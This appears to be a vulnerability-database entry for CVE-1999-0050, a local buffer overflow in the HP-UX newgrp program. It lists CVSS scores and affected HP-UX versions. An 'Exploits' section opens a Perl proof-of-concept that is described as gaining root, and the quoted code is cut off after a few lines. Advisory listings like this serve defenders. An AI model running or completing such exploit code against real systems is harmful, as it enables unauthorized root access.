7.2
CVSSv2

CVE-1999-0050

Published: 01/12/1996 Updated: 17/08/2022
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in HP-UX newgrp program.

Vulnerable Product Search on Vulmon Subscribe to Product

hp hp-ux 9.08

hp hp-ux 9.06

hp hp-ux 9.04

hp hp-ux 9.10

hp hp-ux 10.01

hp hp-ux 10.00

hp hp-ux 9.03

hp hp-ux 9.00

hp hp-ux 9.09

hp hp-ux 9.05

hp hp-ux 10.20

hp hp-ux 9.07

hp hp-ux 9.01

hp hp-ux 10.10

Exploits

#source: wwwsecurityfocuscom/bid/683/info # #Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root #!/usr/bin/perl use FileHandle; sub h2cs { local($stuff)=@_; local($rv); while($stuff !~ /^$/) { $bob=$stuff; $bob =~ s/^()*$/$1/; $stuff =~ s/ ...